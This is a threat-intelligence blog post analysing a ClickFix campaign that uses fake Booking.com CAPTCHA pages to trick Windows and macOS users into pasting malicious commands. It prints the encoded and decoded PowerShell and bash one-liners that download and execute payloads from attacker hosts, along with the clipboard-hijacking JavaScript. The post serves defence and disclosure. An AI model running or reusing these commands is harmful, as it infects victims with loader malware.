Malware Analysis
ClickFix是一种社会工程学攻击手法,诱导用户在终端执行恶意命令。近期观察显示该活动活跃,涉及针对Windows和macOS的新有效载荷及HijackLoader恶意软件。攻击者利用动态生成页面及俄语代码注释,表明其持续进化与活跃性。 2025-12-9 14:16:54 Author: www.certego.net(查看原文) 阅读量:7 收藏

Introduction

ClickFix is a well-known social-engineering technique that leads users to compromise themselves by pasting and executing a malicious command in the terminal of their operating system. In recent weeks, our Security Operations Team has directly observed this campaign being actively used, further confirming its relevance and real-world impact. As highlighted in several analyses by Joe Security and other researchers, this threat continues to evolve in its themes, delivery methods, and level of sophistication, remaining a highly effective attack vector even today.

Starting from an initial finding shared by @BlinkzSec, our Threat Intelligence team expanded the investigation based on the data surfaced by our SecOps Team and identified several new domains linked to the ClickFix operation, which appears to be still ongoing. The analysis also revealed pages delivering OS-specific payloads targeting both Windows and macOS users. Based on multiple indicators, we believe with a high degree of confidence that these components were vibe-coded by a Russian-speaking operator.

Starting point

In this campaign the user is presented with the ClickFix lure: a blurred page displaying a fake verification in the background with a banner that mimics legitimate CAPTCHA challenge.

Pasted image 20251204124821

By pressing the button the user is presented with some instructions to follow in order to "verify" its request.

Pasted image 20251204124930

These instruction automatically copy in the victim's clipboard the payload for another stage ```powershell powershell -wind mi -Enc JAByAD0AJwBkAG8AdwAgAHkAbwB1AHIAZgBpACcAOwAuACcAaQBlAHgAJwAoACYAKAAkAHIAWwA5AF0AKwAkAHIAWwAyAF0AKwAkAHIAWwA3AF0AKQAgAGgAdAB0AHAAcwA6AC8ALwBrAGoAYQByAHoALgBjAG8AbQAvAGoALgB0AHgAdAApAC4AQwBvAG4AdABlAG4AdAA= ``` Decoding the Base64 coded text we obtain a web request to another page on the same domain, containing a text file ```powershell $r='dow yourfi';.'iex'(&($r[9]+$r[2]+$r[7]) https://kjarz.com/j.txt).Content ``` The file j.txt contains an obfuscated PowerShell script whose purpose is to download the file named `BMUAUFKZ.msi` on the same domain. This file has been identified as **HijackLoader** malware family. From VirusTotal relation page, this sample is contacting IP `212.11.64.95`, possibly it's C2 server located in SC and with many other communicating files with high detection rate. This can be a sign of an wider and extended operation carried out by the Threat Actor: https://www.virustotal.com/gui/ip-address/212.11.64.95/relations

Furthermore, the root page of the domain has an open directory, enabling us to access everything from the page, including the ClickFix source code named uri.html.

Pasted image 20251204125541

The directory seems to host also another variant of HijackLoader, named `MRXTOHRL.msi`.

Web page

The HTML source page itself is fairly common in this kind of attack: it contains a JavaScript code whose main purpose is to dynamically decode and build the malicious web page. The loaded page loads the images and hosts the payload shown above, manipulating user clipboard.

function copyToClipboard() {
navigator.clipboard.writeText
                ("powershell -wind mi -Enc JAByAD0AJwBkAG8AdwAgAHkAbwB1AHIAZgBpACcAOwAuACcAaQBlAHgAJwAoACYAKAAkAHIAWwA5AF0AKwAkAHIAWwAyAF0AKwAkAHIAWwA3AF0AKQAgAGgAdAB0AHAAcwA6AC8ALwBrAGoAYQByAHoALgBjAG8AbQAvAGoALgB0AHgAdAApAC4AQwBvAG4AdABlAG4AdAA=");
    }

Pivoting

The malicious page is hosted on IP address 88.214.50.121, a Russian IP address part of AS 216341, OPTIMA LLC. Pivoting on the IP address that is hosting the domain, we discovered a wider ClickFix Booking.com themed campaign.

hxxps[:]//account-captcha-id4234[.cfd/uri.html
hxxps[:]//account-bookscaptcha[.com/uri.html
hxxps[:]//account-bookextranet[.icu/uri.html
hxxps[:]//account-bookcaptcha[.com/uri.html
hxxps[:]//account-bookcaptcha[.cfd/uri.html
hxxps[:]//account-extranetcaptchapulse[.com/uri.html
https[:]//account-extranetpulser[.com/uri.html
hxxps[:]//account-extrapulse[.cfd/uri.html

Another variant: OS specific payload

One domain in particular caught our attention: hxxps[:]//account-extracaptcha[.com/uri.html Despite being visually nearly identical to other pages in the campaign, it has a different source code, aiming to a winder audience. In fact, the JavaScript code of this page looks for the operating system of the user, displaying a different page if the user is accessing through MacOS or Windows:

	// Функция для определения операционной системы|
	function getOS() {
		const userAgent = navigator.userAgent.toLowerCase();
		if (userAgent.includes('win')) return 'windows';
		if (userAgent.includes('mac')) return 'mac';
		return 'other';
	}
	
	// [...]
	
    // Альтернативный подход - перехват события отправки формы
    function interceptFormSubmission() {
        document.addEventListener('submit', function(e) {
            // Проверяем, связано ли событие с CAPTCHA
            if (e.target.closest('awswaf-captcha')) {
                e.preventDefault();
                e.stopPropagation();

                const os = getOS();

                if (os === 'windows') {
                    window.location.href = 'uri.html';
                } else if (os === 'mac') {
                    createMacInstructionModal();
                } else {
                    window.location.href = '/';
                }
            }
        });
    }

Notice the code comment in Russian language, meaning "Alternative approach – intercepting the form submission event." Near this comment we can find other russian comments saying things like "Additional click handler", "Run both approaches for reliability.", "Add the Booking.com header as in the example" and "Function to create a modal window with instructions for Mac (as in the example)". This is a clear indicator of usage of LLM in writing the webpage and of a debug and improvement cycle during the development.

This particular page seems to target also MacOS users by copying this string in their clipboard, ready to be executed.

echo \'ZWNobyAnVmVyaWZpY2F0aW9uIHBsZWFzZSB3YWl0Li4uJyAmJiBjdXJsIC1zIC1rICdodHRwczovL2RlZmF1bHRnYXRlLnNwYWNlL2N1cmwvMzVkNGRkNzc3MTkxNjkxZWY0OWMxNjNlYTBlMjJkYTZjMjAwYjU3YzMwYzA1OTc4YmU3YWJmNmRlMGE0MDU2YScgLW8gL3RtcC9sYXVuY2ggJiYgY2htb2QgK3ggL3RtcC9sYXVuY2ggJiYgL3RtcC9sYXVuY2g=\' | base64 -d | bash

Decoded into

echo 'Verification please wait...' && curl -s -k 'https://defaultgate.space/curl/35d4dd777191691ef49c163ea0e22da6c200b57c30c05978be7abf6de0a4056a' -o /tmp/launch && chmod +x /tmp/launch && /tmp/launch

If the page is being navigated from a Windows machine, the payload that gets copied is

powershell -wi mi -Enc LgAnAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAnACgAdwBnAGUAdAAgAC0AdQBzAGUAYgBhAHMAaQBjACAAaAB0AHQAcABzADoALwAvAGoAcQBxAGkAYwBlAC4AYwBvAG0ALwBtAC4AdAB4AHQAKQAuAEMAbwBuAHQAZQBuAHQA

Decoded into

.'Invoke-Expression'(wget -usebasic https://jqqice.com/m.txt).Content

Unluckily, at the time of writing the both pages has been taken down, so we can't confirm what was going to be downloaded on victim machines.

IOCs

At the end of our investigation, the Certego Threat Intelligence Team identified a set of Indicators of Compromise (IOCs) associated with the ClickFix operation observed in recent weeks. These artifacts include malicious file hashes, URLs used to deliver the payloads, and IP addresses linked to the campaign’s infrastructure.

Hashes

8986d305ceed84c8dbc430ae7caf31b645f22fe5c4c29bca869eaee9abc46585  BMUAUFKZ.msi
dab70bc2d883a287e4dc3c468dc98ced3eccd19c14fc267c1979613f721632b3  index.txt
086d9294348d95feb9f740db515f9708d2ab76cfa15815b7c7f79122932900de  j.txt
ba8f2313b3398187c424d9abed5f735907d01ebc9a11077136d2919e369501d6  MRXTOHRL.msi
0ccf7e387d851eb26bbc7d1895dab427d9cc392916523f5d06ba64a16fdbd616  uri.html

fbb7ca141535f13ca986f27d93151bc224dfece1ec2100bbab0a943b69a19aec  DWKNANVH.msi

URL

hxxps[:]//kjarz.[com/uri.html
hxxps[:]//kjarz.[com/j.txt
hxxps[:]//kjarz.[com/MRXTOHRL.msi
hxxps[:]//kjarz.[com/BMUAUFKZ.msi

hxxps[:]//account-captcha-id4234[.cfd/uri.html
hxxps[:]//77.90.60.32/j.txt
hxxps[:]//kirgr[.com/DWKNANVH.msi
hxxps[:]//account-bookscaptcha[.com/uri.html
hxxps[:]//account-bookextranet[.icu/uri.html
hxxps[:]//account-bookcaptcha[.com/uri.html
hxxps[:]//account-bookcaptcha[.cfd/uri.html
hxxps[:]//account-extranetcaptchapulse[.com/uri.html
https[:]//account-extranetpulser[.com/uri.html
hxxps[:]//account-extrapulse[.cfd/uri.html
hxxps[:]//icejqq[.com/jj.txt
hxxps[:]//icejqq[.com/j.txt

hxxps[:]//account-extracaptcha[.com/uri.html
hxxps[:]//defaultgate[.space/curl/35d4dd777191691ef49c163ea0e22da6c200b57c30c05978be7abf6de0a4056a  # MacOS-specific payload
hxxps[:]//jqqice[.com/m.txt  # Windows-specific payload

IP

88.214.50.121 # Hosting IP
212.11.64.95  # HijackLoader C2

Conclusions

The ClickFix campaign analyzed in recent weeks once again demonstrates how threat actors continue to invest in social-engineering techniques that are simple yet highly effective, capable of targeting both Windows and macOS users through increasingly polished deception mechanisms. The elements uncovered — new infrastructure, OS-specific payloads, and clear iterative development patterns — indicate that this operation remains active and continuously evolving.

At Certego, we will continue to closely monitor this and other related campaigns, constantly expanding our visibility and updating our detection capabilities to promptly identify any new variants or infrastructure leveraged by the threat actor. Any significant developments will be shared through our Threat Intelligence channels and on the company blog.


文章来源: https://www.certego.net/blog/malware-analysis-clickfix/
如有侵权请联系:admin#unsafe.sh